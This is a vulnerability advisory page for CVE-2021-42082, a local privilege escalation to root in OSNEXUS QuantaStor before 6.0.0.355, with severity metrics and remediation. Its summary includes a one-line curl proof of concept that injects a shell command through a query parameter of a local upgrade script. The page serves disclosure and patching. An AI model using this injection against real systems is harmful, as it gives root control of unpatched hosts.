Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355
Key facts
- Attack vector
- Local
- Privileges required
- Low
- User interaction
- None
- Attack complexity
- Low
- Impact type
- Privilege escalation
- Confidentiality · integrity · availability
- High · High · High
- Fix status
- Fixed
Attack profile from CVSS 3.1 · CNA. Fix status from CNA. Impact type from CWE-269.
Summary
Local users are able to execute scripts under root privileges. POC On the local host run the following command: curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`'
Why it matters now
SSVC decision points
CISA ADP · SSVC 2.0.3
- Exploitation
- None
- Automatable
- No
- Technical impact
- Total
The decision (Track, Attend, Act) also depends on your mission and well-being impact; see CISA's SSVC guide.
Affected products
Remediation
- Fix · CNA QuantaStor (OSNEXUS) Fixed in 6.0.0.355
Fixed in the same release
Records fixed by the same vendor advisory or release, as the CNA lists them.
- Release ·
OSNEXUS QuantaStor 6.0.0.355
5 records Highest priority Priority MEDIUM 1 MEDIUM, 4 LOW
Other records, highest priority first
- TI-2021-18590 Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355Priority MEDIUM 44
- TI-2021-18592 Authenticated Stored XSS in OSNEXUS QuantaStor 6.0.0.335Priority LOW 38
- TI-2021-18589 Reflected XSS vulnerability in OSNEXUS QuantaStor before 6.0.0.355Priority LOW 34
Timeline
- 2026-10-02 Threatist record created from CVE-2021-42082
- 2026-10-03 Alias added: GHSA-3x7w-vvg2-w6r8
References
More OSNEXUS Quantastor vulnerabilities
- TI-2021-03263 Authenticated Remote COmmand Execution as root in OSNEXUS QuantaStor version 6.0.0.355 and others CVSS 3.1CRITICAL 9.1
- TI-2021-18590 Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355 CVSS 3.1CRITICAL 9.1
- TI-2021-18592 Authenticated Stored XSS in OSNEXUS QuantaStor 6.0.0.335 CVSS 3.1HIGH 8.7
- TI-2021-18589 Reflected XSS vulnerability in OSNEXUS QuantaStor before 6.0.0.355 CVSS 3.1HIGH 7.4
- TI-2017-07338 On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, if the REST call invoked… CVSS 3.0MEDIUM 6.1
- TI-2017-07337 On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, a flaw was found with the… CVSS 3.0MEDIUM 5.3
Sources
- CVE-2021-42082 · CVE Program
- CVE-2021-42082 · NVD
- FIRST EPSS
- GHSA-3x7w-vvg2-w6r8 · GitHub Advisory Database · CC BY 4.0
This product uses the NVD API but is not endorsed or certified by the NVD. Sources and licences